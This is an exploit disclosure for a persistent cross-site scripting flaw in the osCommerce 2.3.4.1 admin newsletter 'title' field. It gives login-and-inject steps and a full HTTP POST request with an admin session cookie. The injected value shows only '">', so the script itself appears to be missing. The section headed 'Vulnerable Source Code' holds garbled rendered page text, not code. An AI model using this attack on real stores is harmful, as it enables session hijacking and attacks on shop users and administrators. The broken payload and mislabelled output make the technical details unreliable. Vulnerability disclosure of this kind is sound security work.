# Exploit Title: osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting
# Date: 2020-11-19
# Exploit Author: Emre Aslan
# Vendor Homepage: https://www.oscommerce.com/
# Version: 2.3.4.1
# Tested on: Windows & XAMPP

==> Tutorial <==

1- Log in to the admin panel.
2- Go to the following URL.
==> http(s)://(HOST)/catalog/admin/newsletters.php?action=new
3- Enter the XSS payload into the title field and save it.

==> Vulnerable Parameter <==

title= (POST parameter)

==> HTTP Request <==

POST /catalog/admin/newsletters.php?action=insert HTTP/1.1
Host: (HOST)
Connection: keep-alive
Content-Length: 123
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://(HOST)/
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://(HOST)/catalog/admin/newsletters.php?action=new
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: osCAdminID=s11ou44m0vrasducn78c6sg

module=newsletter&title=">&content=xss

==> Vulnerable Source Code <==
Newsletter Manager
Newsletters Size Module Sent Status Action 
Preview "> 3 bytes newsletter False Unlocked  
Preview "> 7 bytes newsletter False Unlocked Info 
Displaying 1 to 2 (of 2 newsletters) Page 1 of 1
New Newsletter
">
PreviewLock

Date Added: 11/19/2020